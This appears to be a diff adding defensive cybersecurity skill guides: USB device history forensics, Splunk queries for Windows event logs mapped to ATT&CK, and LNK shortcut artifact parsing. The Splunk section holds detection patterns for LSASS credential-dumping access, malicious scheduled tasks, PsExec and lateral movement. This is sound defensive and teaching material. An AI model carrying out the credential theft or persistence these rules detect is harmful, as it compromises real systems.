print("\n=== USB DEVICE SUMMARY ===")
|
||||
for entry in timeline:
|
||||
print(f" {entry['timestamp']} | {entry['device']} | {entry['serial'][:20]} | {entry['event']}")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| USBSTOR | Registry key storing USB mass storage device identification and connection data |
|
||||
| VID/PID | Vendor ID and Product ID uniquely identifying USB device manufacturer and model |
|
||||
| Device serial number | Unique identifier for individual USB devices (some devices share serials) |
|
||||
| MountedDevices | Registry key mapping volume GUIDs and drive letters to physical devices |
|
||||
| MountPoints2 | Per-user registry key showing which volumes a user accessed |
|
||||
| SetupAPI log | Windows driver installation log recording first-time device connections |
|
||||
| DeviceContainers | Registry key in SOFTWARE hive with device metadata and timestamps |
|
||||
| EMDMgmt | Registry key tracking ReadyBoost-compatible devices with serial numbers and timestamps |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| USB Forensic Tracker | Specialized tool for USB device history extraction |
|
||||
| USBDeview | NirSoft tool listing all USB devices connected to a system |
|
||||
| RegRipper (usbstor plugin) | Automated USB artifact extraction from registry hives |
|
||||
| Registry Explorer | Interactive registry analysis for USB-related keys |
|
||||
| KAPE | Automated collection of USB-related artifacts |
|
||||
| Plaso/log2timeline | Timeline creation including USB connection events |
|
||||
| FTK Imager | Forensic imaging including removable media |
|
||||
| Velociraptor | Endpoint agent with USB device history hunting artifacts |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Data Exfiltration by Departing Employee**
|
||||
Extract USBSTOR entries to identify all USB devices ever connected, correlate device serial numbers with MountPoints2 to confirm user access, cross-reference timestamps with file access logs and jump list recent files, check for large file copy patterns in USN journal.
|
||||
|
||||
**Scenario 2: Unauthorized Device on Secure System**
|
||||
Audit all USBSTOR entries against approved device list, identify unauthorized devices by VID/PID not matching corporate-approved hardware, determine when the unauthorized device was first and last connected, check if any data was transferred.
|
||||
|
||||
**Scenario 3: Malware Delivery via USB**
|
||||
Identify USB device connected just before malware execution (Prefetch timestamps), extract the device serial and vendor information, check if autorun was enabled for the device, look for executable launch from the removable drive letter in Prefetch and ShimCache.
|
||||
|
||||
**Scenario 4: Tracking a Specific USB Drive Across Multiple Systems**
|
||||
Search for the same device serial number in USBSTOR across all forensic images, build a map of which systems the drive was connected to and when, identify the chronological path of the device through the organization, correlate with network share access logs.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
USB Device History Analysis:
|
||||
System: DESKTOP-ABC123 (Windows 10 Pro)
|
||||
Total USB Storage Devices: 12
|
||||
Analysis Sources: USBSTOR, MountedDevices, MountPoints2, SetupAPI, Event Logs
|
||||
|
||||
Device Inventory:
|
||||
1. Kingston DataTraveler 3.0 (Serial: 0019E06B4521A2B0)
|
||||
First Connected: 2024-01-10 09:15:32 (SetupAPI)
|
||||
Last Connected: 2024-01-18 14:30:00 (USBSTOR)
|
||||
Drive Letter: E:
|
||||
User Access: suspect_user (MountPoints2)
|
||||
|
||||
2. WD My Passport (Serial: 575834314131363035)
|
||||
First Connected: 2024-01-15 20:00:00
|
||||
Last Connected: 2024-01-15 23:45:00
|
||||
Drive Letter: F:
|
||||
User Access: suspect_user
|
||||
|
||||
Suspicious Findings:
|
||||
- Kingston drive connected 15 times during investigation period
|
||||
- WD Passport connected only once, late evening (unusual hours)
|
||||
- Unknown device (VID_1234&PID_5678) connected 2024-01-17, no matching approved device
|
||||
|
||||
Timeline: /cases/case-2024-001/analysis/usb_timeline.csv
|
||||
```
|
||||
@@ -0,0 +1,279 @@
|
||||
---
|
||||
name: analyzing-windows-event-logs-in-splunk
|
||||
description: >
|
||||
Analyzes Windows Security, System, and Sysmon event logs in Splunk to detect authentication attacks,
|
||||
privilege escalation, persistence mechanisms, and lateral movement using SPL queries mapped to
|
||||
MITRE ATT&CK techniques. Use when SOC analysts need to investigate Windows-based threats,
|
||||
build detection queries, or perform forensic timeline analysis of Windows endpoints and domain controllers.
|
||||
domain: cybersecurity
|
||||
subdomain: soc-operations
|
||||
tags: [soc, splunk, windows-events, sysmon, event-logs, mitre-attack, active-directory]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Windows Event Logs in Splunk
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- SOC analysts investigate alerts related to Windows authentication, process execution, or AD changes
|
||||
- Detection engineers build SPL queries for Windows-based threat detection
|
||||
- Incident responders need forensic timelines of Windows endpoint or domain controller activity
|
||||
- Periodic threat hunting targets Windows-specific ATT&CK techniques
|
||||
|
||||
**Do not use** for Linux/macOS endpoint analysis or network-only investigations.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Splunk with Windows Event Log data ingested (sourcetype `WinEventLog:Security`, `WinEventLog:System`, `XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`)
|
||||
- Sysmon deployed on endpoints with SwiftOnSecurity or Olaf Hartong configuration
|
||||
- CIM data model acceleration for Endpoint and Authentication data models
|
||||
- Knowledge of Windows Security Event IDs and Sysmon event types
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Authentication Attack Detection
|
||||
|
||||
**Brute Force Detection (EventCode 4625 — Failed Logon):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4625
|
||||
| stats count, dc(TargetUserName) AS unique_users, values(TargetUserName) AS targeted_users
|
||||
by src_ip, Logon_Type, Status
|
||||
| where count > 20
|
||||
| eval attack_type = case(
|
||||
Logon_Type=3, "Network Brute Force",
|
||||
Logon_Type=10, "RDP Brute Force",
|
||||
Logon_Type=2, "Interactive Brute Force",
|
||||
1=1, "Other"
|
||||
)
|
||||
| eval status_meaning = case(
|
||||
Status="0xc000006d", "Bad Username or Password",
|
||||
Status="0xc000006a", "Incorrect Password (valid user)",
|
||||
Status="0xc0000234", "Account Locked Out",
|
||||
Status="0xc0000072", "Account Disabled",
|
||||
1=1, Status
|
||||
)
|
||||
| sort - count
|
||||
| table src_ip, attack_type, status_meaning, count, unique_users, targeted_users
|
||||
```
|
||||
|
||||
**Password Spray Detection:**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4625 Logon_Type=3
|
||||
| bin _time span=10m
|
||||
| stats dc(TargetUserName) AS unique_users, count AS total_attempts,
|
||||
values(TargetUserName) AS users_targeted by src_ip, _time
|
||||
| where unique_users > 10 AND total_attempts < unique_users * 3
|
||||
| eval spray_confidence = if(unique_users > 25, "HIGH", "MEDIUM")
|
||||
```
|
||||
|
||||
**Successful Logon After Failures (Compromise Indicator):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security"
|
||||
(EventCode=4625 OR EventCode=4624) src_ip!="127.0.0.1"
|
||||
| sort _time
|
||||
| stats earliest(_time) AS first_seen, latest(_time) AS last_seen,
|
||||
sum(eval(if(EventCode=4625,1,0))) AS failures,
|
||||
sum(eval(if(EventCode=4624,1,0))) AS successes
|
||||
by src_ip, TargetUserName, ComputerName
|
||||
| where failures > 10 AND successes > 0
|
||||
| eval time_to_success = round((last_seen - first_seen)/60, 1)
|
||||
| sort - failures
|
||||
```
|
||||
|
||||
### Step 2: Privilege Escalation Detection
|
||||
|
||||
**New Admin Account Created (T1136.001):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4720
|
||||
| join TargetUserName type=left [
|
||||
search index=wineventlog EventCode=4732 TargetUserName="Administrators"
|
||||
| rename MemberName AS TargetUserName
|
||||
]
|
||||
| table _time, SubjectUserName, TargetUserName, ComputerName
|
||||
| eval alert = "New account created and added to Administrators group"
|
||||
```
|
||||
|
||||
**Special Privileges Assigned (EventCode 4672):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4672
|
||||
SubjectUserName!="SYSTEM" SubjectUserName!="LOCAL SERVICE" SubjectUserName!="NETWORK SERVICE"
|
||||
| stats count, values(PrivilegeList) AS privileges by SubjectUserName, ComputerName
|
||||
| where count > 0
|
||||
| search privileges IN ("SeDebugPrivilege", "SeTcbPrivilege", "SeBackupPrivilege",
|
||||
"SeRestorePrivilege", "SeAssignPrimaryTokenPrivilege")
|
||||
```
|
||||
|
||||
**Token Manipulation Detection (T1134):**
|
||||
```spl
|
||||
index=sysmon EventCode=10 TargetImage="*\\lsass.exe"
|
||||
GrantedAccess IN ("0x1010", "0x1038", "0x1fffff", "0x40")
|
||||
| stats count by SourceImage, SourceUser, Computer, GrantedAccess
|
||||
| where NOT match(SourceImage, "(svchost|csrss|wininit|MsMpEng|CrowdStrike)")
|
||||
| sort - count
|
||||
```
|
||||
|
||||
### Step 3: Persistence Mechanism Detection
|
||||
|
||||
**Scheduled Task Creation (T1053.005):**
|
||||
```spl
|
||||
index=wineventlog (sourcetype="WinEventLog:Security" EventCode=4698)
|
||||
OR (sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
|
||||
Image="*\\schtasks.exe")
|
||||
| eval task_info = coalesce(TaskContent, CommandLine)
|
||||
| search task_info="*powershell*" OR task_info="*cmd*" OR task_info="*http*" OR task_info="*\\Temp\\*"
|
||||
| table _time, Computer, SubjectUserName, TaskName, task_info
|
||||
```
|
||||
|
||||
**Registry Run Key Modification (T1547.001):**
|
||||
```spl
|
||||
index=sysmon EventCode=13
|
||||
TargetObject IN (
|
||||
"*\\CurrentVersion\\Run\\*",
|
||||
"*\\CurrentVersion\\RunOnce\\*",
|
||||
"*\\CurrentVersion\\RunServices\\*",
|
||||
"*\\Explorer\\Shell Folders\\*"
|
||||
)
|
||||
| stats count by Computer, Image, TargetObject, Details
|
||||
| where NOT match(Image, "(explorer\.exe|msiexec\.exe|setup\.exe)")
|
||||
| sort - count
|
||||
```
|
||||
|
||||
**WMI Event Subscription (T1546.003):**
|
||||
```spl
|
||||
index=sysmon EventCode=20 OR EventCode=21
|
||||
| stats count by Computer, Operation, Consumer, EventNamespace
|
||||
| where count > 0
|
||||
```
|
||||
|
||||
### Step 4: Lateral Movement Detection
|
||||
|
||||
**Remote Service Exploitation (T1021.002 — SMB/Windows Admin Shares):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4624 Logon_Type=3
|
||||
| stats dc(ComputerName) AS unique_destinations, values(ComputerName) AS targets
|
||||
by src_ip, TargetUserName
|
||||
| where unique_destinations > 3
|
||||
| sort - unique_destinations
|
||||
| table src_ip, TargetUserName, unique_destinations, targets
|
||||
```
|
||||
|
||||
**PsExec Detection (T1021.002):**
|
||||
```spl
|
||||
index=sysmon EventCode=1
|
||||
(Image="*\\psexec.exe" OR Image="*\\psexesvc.exe"
|
||||
OR ParentImage="*\\psexesvc.exe"
|
||||
OR OriginalFileName="psexec.c")
|
||||
| table _time, Computer, User, ParentImage, Image, CommandLine
|
||||
```
|
||||
|
||||
**RDP Lateral Movement (T1021.001):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4624 Logon_Type=10
|
||||
| stats count, dc(ComputerName) AS rdp_targets, values(ComputerName) AS destinations
|
||||
by src_ip, TargetUserName
|
||||
| where rdp_targets > 2
|
||||
| sort - rdp_targets
|
||||
```
|
||||
|
||||
### Step 5: Build Forensic Timeline
|
||||
|
||||
Create comprehensive timeline for a compromised host:
|
||||
|
||||
```spl
|
||||
(index=wineventlog OR index=sysmon) Computer="WORKSTATION-042"
|
||||
earliest="2024-03-14T00:00:00" latest="2024-03-16T00:00:00"
|
||||
| eval event_description = case(
|
||||
EventCode=4624, "Logon: ".TargetUserName." (Type ".Logon_Type.")",
|
||||
EventCode=4625, "Failed Logon: ".TargetUserName,
|
||||
EventCode=4688 OR (sourcetype="XmlWinEventLog:*Sysmon*" AND EventCode=1),
|
||||
"Process: ".Image." CMD: ".CommandLine,
|
||||
EventCode=4698, "Scheduled Task: ".TaskName,
|
||||
EventCode=3, "Network: ".DestinationIp.":".DestinationPort,
|
||||
EventCode=11, "File Created: ".TargetFilename,
|
||||
EventCode=13, "Registry: ".TargetObject,
|
||||
1=1, "Event ".EventCode
|
||||
)
|
||||
| sort _time
|
||||
| table _time, EventCode, event_description, User, src_ip
|
||||
```
|
||||
|
||||
### Step 6: Create Lookup Tables for Enrichment
|
||||
|
||||
Build reference lookups for Windows Event ID context:
|
||||
|
||||
```spl
|
||||
| inputlookup windows_eventcode_lookup.csv
|
||||
| table EventCode, Description, ATT_CK_Technique, Severity
|
||||
```
|
||||
|
||||
If lookup doesn't exist, create it:
|
||||
|
||||
```csv
|
||||
EventCode,Description,ATT_CK_Technique,Severity
|
||||
4624,Successful Logon,T1078,Informational
|
||||
4625,Failed Logon,T1110,Low
|
||||
4648,Explicit Credential Logon,T1078,Medium
|
||||
4672,Special Privileges Assigned,T1134,Medium
|
||||
4688,New Process Created,T1059,Informational
|
||||
4698,Scheduled Task Created,T1053.005,Medium
|
||||
4720,User Account Created,T1136.001,High
|
||||
4732,Member Added to Security Group,T1098,High
|
||||
4768,Kerberos TGT Requested,T1558,Informational
|
||||
4769,Kerberos Service Ticket,T1558.003,Low
|
||||
4771,Kerberos Pre-Auth Failed,T1110,Low
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **EventCode 4624** | Successful logon event — Logon_Type 2 (interactive), 3 (network), 10 (RDP), 7 (unlock) |
|
||||
| **EventCode 4625** | Failed logon event — Status code indicates failure reason (bad password, account locked, disabled) |
|
||||
| **Sysmon EventCode 1** | Process creation with full command line, parent process, and hash information |
|
||||
| **Sysmon EventCode 3** | Network connection initiated by a process — source/dest IP, port, and process context |
|
||||
| **Logon Type 3** | Network logon (SMB, WMI, PowerShell Remoting) — key indicator of lateral movement |
|
||||
| **Logon Type 10** | Remote interactive logon via RDP/Terminal Services |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Splunk Enterprise**: SIEM platform with SPL query engine for Windows event log analysis and correlation
|
||||
- **Sysmon (System Monitor)**: Microsoft Sysinternals tool providing detailed process, network, and file activity logging
|
||||
- **Splunk CIM**: Common Information Model mapping Windows events to normalized fields for cross-source queries
|
||||
- **Windows Event Forwarding (WEF)**: Built-in Windows mechanism for centralizing event logs to a collector server
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
- **Kerberoasting (T1558.003)**: Detect EventCode 4769 with encryption type 0x17 (RC4) for non-standard service accounts
|
||||
- **DCSync (T1003.006)**: Detect EventCode 4662 with DS-Replication-Get-Changes from non-DC sources
|
||||
- **Golden Ticket (T1558.001)**: Detect EventCode 4769 with abnormal ticket properties (long lifetime, non-standard encryption)
|
||||
- **Pass-the-Hash (T1550.002)**: Detect EventCode 4624 Logon_Type 3 with NTLM authentication from unexpected sources
|
||||
- **DLL Side-Loading (T1574.002)**: Sysmon EventCode 7 showing unsigned DLLs loaded by legitimate processes
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
WINDOWS EVENT LOG ANALYSIS — HOST: WORKSTATION-042
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
Period: 2024-03-14 to 2024-03-15
|
||||
Events: 12,847 total (Security: 9,231 | Sysmon: 3,616)
|
||||
|
||||
Authentication Summary:
|
||||
Successful Logons (4624): 487 (Type 3: 312, Type 10: 45, Type 2: 130)
|
||||
Failed Logons (4625): 847 (from 192.168.1.105 — BRUTE FORCE)
|
||||
Explicit Creds (4648): 12
|
||||
|
||||
Suspicious Findings:
|
||||
[HIGH] 847 failed logons followed by success at 14:35 from 192.168.1.105
|
||||
[HIGH] New user "backdoor_admin" created (4720) at 14:38
|
||||
[HIGH] User added to Administrators group (4732) at 14:38
|
||||
[MEDIUM] schtasks.exe creating persistence task at 14:42
|
||||
[MEDIUM] PowerShell encoded command execution at 14:45
|
||||
|
||||
ATT&CK Mapping:
|
||||
T1110.001 — Password Guessing (847 failed logons)
|
||||
T1136.001 — Local Account Creation (backdoor_admin)
|
||||
T1053.005 — Scheduled Task (persistence)
|
||||
T1059.001 — PowerShell (encoded execution)
|
||||
```
|
||||
@@ -0,0 +1,310 @@
|
||||
---
|
||||
name: analyzing-windows-lnk-files-for-artifacts
|
||||
description: Parse Windows LNK shortcut files to extract target paths, timestamps, volume information, and machine identifiers for forensic timeline reconstruction.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, lnk-files, windows-artifacts, shortcut-analysis, timeline-reconstruction, evidence-collection]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Windows LNK Files for Artifacts
|
||||
|
||||
## When to Use
|
||||
- When reconstructing user file access history from Windows shortcut files
|
||||
- For tracking accessed files, network shares, and removable media
|
||||
- During investigations to prove a user opened specific documents
|
||||
- When correlating file access with other timeline artifacts
|
||||
- For identifying accessed paths on remote systems or USB devices
|
||||
|
||||
## Prerequisites
|
||||
- Access to LNK files from forensic image (Recent, Desktop, Quick Launch)
|
||||
- LECmd (Eric Zimmerman), python-lnk, or LnkParser for analysis
|
||||
- Understanding of LNK file structure (Shell Link Binary format)
|
||||
- Knowledge of LNK file locations on Windows systems
|
||||
- Forensic workstation with analysis tools installed
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Collect LNK Files from Forensic Image
|
||||
|
||||
```bash
|
||||
# Mount forensic image
|
||||
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/evidence.dd /mnt/evidence
|
||||
|
||||
mkdir -p /cases/case-2024-001/lnk/{recent,desktop,startup,custom}
|
||||
|
||||
# Copy Recent items LNK files (primary source)
|
||||
cp /mnt/evidence/Users/*/AppData/Roaming/Microsoft/Windows/Recent/*.lnk \
|
||||
/cases/case-2024-001/lnk/recent/ 2>/dev/null
|
||||
|
||||
# Copy automatic destinations (Jump Lists)
|
||||
cp /mnt/evidence/Users/*/AppData/Roaming/Microsoft/Windows/Recent/AutomaticDestinations/*.automaticDestinations-ms \
|
||||
/cases/case-2024-001/lnk/recent/ 2>/dev/null
|
||||
|
||||
# Copy custom destinations (pinned Jump List items)
|
||||
cp /mnt/evidence/Users/*/AppData/Roaming/Microsoft/Windows/Recent/CustomDestinations/*.customDestinations-ms \
|
||||
/cases/case-2024-001/lnk/custom/ 2>/dev/null
|
||||
|
||||
# Copy Desktop shortcuts
|
||||
cp /mnt/evidence/Users/*/Desktop/*.lnk /cases/case-2024-001/lnk/desktop/ 2>/dev/null
|
||||
|
||||
# Copy Startup folder shortcuts (persistence)
|
||||
cp /mnt/evidence/Users/*/AppData/Roaming/Microsoft/Windows/Start\ Menu/Programs/Startup/*.lnk \
|
||||
/cases/case-2024-001/lnk/startup/ 2>/dev/null
|
||||
cp "/mnt/evidence/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup"/*.lnk \
|
||||
/cases/case-2024-001/lnk/startup/ 2>/dev/null
|
||||
|
||||
# Find all LNK files on the system
|
||||
find /mnt/evidence/ -name "*.lnk" -type f 2>/dev/null > /cases/case-2024-001/lnk/all_lnk_locations.txt
|
||||
|
||||
# Count and hash
|
||||
ls /cases/case-2024-001/lnk/recent/ | wc -l
|
||||
sha256sum /cases/case-2024-001/lnk/recent/*.lnk > /cases/case-2024-001/lnk/lnk_hashes.txt 2>/dev/null
|
||||
```
|
||||
|
||||
### Step 2: Parse LNK Files with LECmd
|
||||
|
||||
```bash
|
||||
# Using Eric Zimmerman's LECmd (Windows or via Mono)
|
||||
# Process all LNK files in a directory
|
||||
LECmd.exe -d "C:\cases\lnk\recent\" --csv "C:\cases\analysis\" --csvf lnk_analysis.csv
|
||||
|
||||
# Process a single LNK file with verbose output
|
||||
LECmd.exe -f "C:\cases\lnk\recent\document.pdf.lnk"
|
||||
|
||||
# Process Jump List files
|
||||
JLECmd.exe -d "C:\cases\lnk\recent\" --csv "C:\cases\analysis\" --csvf jumplist_analysis.csv
|
||||
|
||||
# Output includes:
|
||||
# - Source file path
|
||||
# - Target path (file that was accessed)
|
||||
# - Target creation, modification, access timestamps
|
||||
# - LNK creation and modification timestamps
|
||||
# - Working directory
|
||||
# - Command line arguments
|
||||
# - Volume serial number and label
|
||||
# - Drive type (Fixed, Removable, Network)
|
||||
# - Machine ID (NetBIOS name)
|
||||
# - MAC address (from tracker database)
|
||||
# - File size of target
|
||||
```
|
||||
|
||||
### Step 3: Parse LNK Files with Python
|
||||
|
||||
```bash
|
||||
pip install LnkParse3
|
||||
|
||||
python3 << 'PYEOF'
|
||||
import LnkParse3
|
||||
import os, json, csv
|
||||
from datetime import datetime
|
||||
|
||||
lnk_dir = '/cases/case-2024-001/lnk/recent/'
|
||||
results = []
|
||||
|
||||
for filename in sorted(os.listdir(lnk_dir)):
|
||||
if not filename.lower().endswith('.lnk'):
|
||||
continue
|
||||
|
||||
filepath = os.path.join(lnk_dir, filename)
|
||||
try:
|
||||
with open(filepath, 'rb') as f:
|
||||
lnk = LnkParse3.lnk_file(f)
|
||||
info = lnk.get_json()
|
||||
|
||||
parsed = {
|
||||
'lnk_file': filename,
|
||||
'target_path': '',
|
||||
'working_dir': '',
|
||||
'arguments': '',
|
||||
'target_created': '',
|
||||
'target_modified': '',
|
||||
'target_accessed': '',
|
||||
'file_size': '',
|
||||
'drive_type': '',
|
||||
'volume_serial': '',
|
||||
'volume_label': '',
|
||||
'machine_id': '',
|
||||
'mac_address': '',
|
||||
}
|
||||
|
||||
# Extract header timestamps
|
||||
header = info.get('header', {})
|
||||
parsed['target_created'] = str(header.get('creation_time', ''))
|
||||
parsed['target_modified'] = str(header.get('modified_time', ''))
|
||||
parsed['target_accessed'] = str(header.get('accessed_time', ''))
|
||||
parsed['file_size'] = str(header.get('file_size', ''))
|
||||
|
||||
# Extract link info
|
||||
link_info = info.get('link_info', {})
|
||||
if link_info:
|
||||
local_path = link_info.get('local_base_path', '')
|
||||
network_path = link_info.get('common_network_relative_link', {}).get('net_name', '')
|
||||
parsed['target_path'] = local_path or network_path
|
||||
|
||||
vol_info = link_info.get('volume_id', {})
|
||||
if vol_info:
|
||||
parsed['drive_type'] = str(vol_info.get('drive_type', ''))
|
||||
parsed['volume_serial'] = str(vol_info.get('drive_serial_number', ''))
|
||||
parsed['volume_label'] = str(vol_info.get('volume_label', ''))
|
||||
|
||||
# Extract string data
|
||||
string_data = info.get('string_data', {})
|
||||
parsed['working_dir'] = str(string_data.get('working_dir', ''))
|
||||
parsed['arguments'] = str(string_data.get('command_line_arguments', ''))
|
||||
|
||||
# Extract tracker data (machine ID and MAC)
|
||||
extra = info.get('extra', {})
|
||||
tracker = extra.get('DISTRIBUTED_LINK_TRACKER_BLOCK', {})
|
||||
if tracker:
|
||||
parsed['machine_id'] = str(tracker.get('machine_id', ''))
|
||||
parsed['mac_address'] = str(tracker.get('mac_address', ''))
|
||||
|
||||
results.append(parsed)
|
||||
|
||||
# Print summary
|
||||
print(f"\n{filename}")
|
||||
print(f" Target: {parsed['target_path']}")
|
||||
print(f" Modified: {parsed['target_modified']}")
|
||||
print(f" Drive: {parsed['drive_type']} (Serial: {parsed['volume_serial']})")
|
||||
if parsed['machine_id']:
|
||||
print(f" Machine: {parsed['machine_id']}")
|
||||
|
||||
except Exception as e:
|
||||
print(f" Error parsing {filename}: {e}")
|
||||
|
||||
# Write results to CSV
|
||||
with open('/cases/case-2024-001/analysis/lnk_analysis.csv', 'w', newline='') as f:
|
||||
writer = csv.DictWriter(f, fieldnames=results[0].keys() if results else [])
|
||||
writer.writeheader()
|
||||
writer.writerows(results)
|
||||
|
||||
print(f"\n\nTotal LNK files parsed: {len(results)}")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 4: Analyze for Investigative Value
|
||||
|
||||
```bash
|
||||
# Identify files accessed from removable media
|
||||
python3 << 'PYEOF'
|
||||
import csv
|
||||
|
||||
with open('/cases/case-2024-001/analysis/lnk_analysis.csv') as f:
|
||||
reader = csv.DictReader(f)
|
||||
|
||||
print("=== FILES ACCESSED FROM REMOVABLE MEDIA ===\n")
|
||||
removable = []
|
||||
network = []
|
||||
|
||||
for row in reader:
|
||||
if 'DRIVE_REMOVABLE' in row.get('drive_type', '').upper() or \
|
||||
'removable' in row.get('drive_type', '').lower():
|
||||
removable.append(row)
|
||||
print(f" {row['target_modified']} | {row['target_path']} | Vol: {row['volume_serial']}")
|
||||
|
||||
if 'network' in row.get('drive_type', '').lower() or \
|
||||
row.get('target_path', '').startswith('\\\\'):
|
||||
network.append(row)
|
||||
|
||||
print(f"\n=== FILES ACCESSED FROM NETWORK SHARES ===\n")
|
||||
for row in network:
|
||||
print(f" {row['target_modified']} | {row['target_path']}")
|
||||
|
||||
print(f"\nRemovable media files: {len(removable)}")
|
||||
print(f"Network share files: {len(network)}")
|
||||
|
||||
# Check for unique machines (tracker data)
|
||||
machines = set()
|
||||
for row in [*removable, *network]:
|
||||
if row.get('machine_id'):
|
||||
machines.add(row['machine_id'])
|
||||
if machines:
|
||||
print(f"\nMachine IDs found: {machines}")
|
||||
PYEOF
|
||||
|
||||
# Check Startup folder LNK files for persistence
|
||||
echo "=== STARTUP FOLDER SHORTCUTS (PERSISTENCE) ===" > /cases/case-2024-001/analysis/startup_persistence.txt
|
||||
for lnk in /cases/case-2024-001/lnk/startup/*.lnk; do
|
||||
python3 -c "
|
||||
import LnkParse3
|
||||
with open('$lnk', 'rb') as f:
|
||||
lnk = LnkParse3.lnk_file(f)
|
||||
info = lnk.get_json()
|
||||
target = info.get('link_info', {}).get('local_base_path', 'Unknown')
|
||||
args = info.get('string_data', {}).get('command_line_arguments', '')
|
||||
print(f' $(basename $lnk): {target} {args}')
|
||||
" >> /cases/case-2024-001/analysis/startup_persistence.txt 2>/dev/null
|
||||
done
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| Shell Link (.lnk) | Windows shortcut file format containing target path, timestamps, and metadata |
|
||||
| Target timestamps | Creation, modification, and access times of the file the shortcut points to |
|
||||
| Volume serial number | Unique identifier of the drive volume where the target file resides |
|
||||
| Machine ID | NetBIOS name embedded by the Distributed Link Tracking service |
|
||||
| MAC address | Network adapter MAC from the machine that created the LNK file |
|
||||
| Jump Lists | Recent and pinned file lists per application (contain embedded LNK data) |
|
||||
| Automatic Destinations | System-managed Jump List entries for recently opened files |
|
||||
| Custom Destinations | User-pinned Jump List items that persist until manually removed |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| LECmd | Eric Zimmerman command-line LNK file parser with CSV/JSON output |
|
||||
| JLECmd | Eric Zimmerman Jump List parser |
|
||||
| LnkParse3 | Python library for programmatic LNK file analysis |
|
||||
| lnk_parser | Alternative Python LNK parsing tool |
|
||||
| Autopsy | Forensic platform with LNK file analysis module |
|
||||
| KAPE | Automated LNK and Jump List artifact collection |
|
||||
| Plaso | Timeline tool with LNK file parser for super-timeline creation |
|
||||
| LNK Explorer | GUI tool for interactive LNK file examination |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Data Exfiltration via USB Drive**
|
||||
Analyze Recent folder LNK files for targets on removable drives, correlate volume serial numbers with USBSTOR registry entries, build a list of files accessed from USB devices, establish which documents were opened from the removable drive, correlate with file copy timestamps.
|
||||
|
||||
**Scenario 2: Malware Persistence via Startup Shortcuts**
|
||||
Examine Startup folder LNK files for malicious targets, check target path and arguments for encoded commands or suspicious executables, verify target file exists and examine it, correlate creation timestamp with initial compromise time.
|
||||
|
||||
**Scenario 3: Network Share Access Investigation**
|
||||
Filter LNK files with network paths (UNC targets), identify which network shares were accessed and when, correlate machine IDs with known corporate systems, check if sensitive file servers were accessed outside of normal duties, build access timeline for compliance investigation.
|
||||
|
||||
**Scenario 4: Document Access Timeline for Legal Proceedings**
|
||||
Extract all Recent folder LNK files, build chronological list of documents accessed by the user, identify specific files relevant to the case, present target timestamps showing when files were opened, correlate with email and communication timelines.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
LNK File Analysis Summary:
|
||||
User Profile: suspect_user
|
||||
Total LNK Files: 234 (Recent: 198, Desktop: 23, Startup: 5, Other: 8)
|
||||
|
||||
File Access Statistics:
|
||||
Local drive (C:): 156 files
|
||||
Removable media: 23 files (3 unique volume serials)
|
||||
Network shares: 15 files (\\server01, \\fileserver)
|
||||
Other drives: 4 files
|
||||
|
||||
Machine IDs Found: DESKTOP-ABC123, LAPTOP-XYZ789
|
||||
MAC Addresses: AA:BB:CC:DD:EE:FF, 11:22:33:44:55:66
|
||||
|
||||
Removable Media Access:
|
||||
Volume Serial 1234-ABCD:
|
||||
2024-01-15 14:32 - E:\Confidential\financial_report.xlsx
|
||||
2024-01-15 14:45 - E:\Confidential\customer_database.csv
|
||||
2024-01-15 15:00 - E:\Projects\source_code.zip
|
||||
|
||||
Startup Persistence:
|
||||
updater.lnk -> C:\ProgramData\svc\updater.exe (SUSPICIOUS)
|
||||
OneDrive.lnk -> C:\Users\...\OneDrive.exe (Legitimate)
|
||||
|
||||
Timeline: /cases/case-2024-001/analysis/lnk_analysis.csv
|
||||
```
|
||||
@@ -0,0 +1,281 @@
|
||||
---
|
||||
name: analyzing-windows-registry-for-artifacts
|
||||
description: Extract and analyze Windows Registry hives to uncover user activity, installed software, autostart entries, and evidence of system compromise.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, windows-registry, artifact-analysis, regripper, registry-explorer, evidence-collection]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
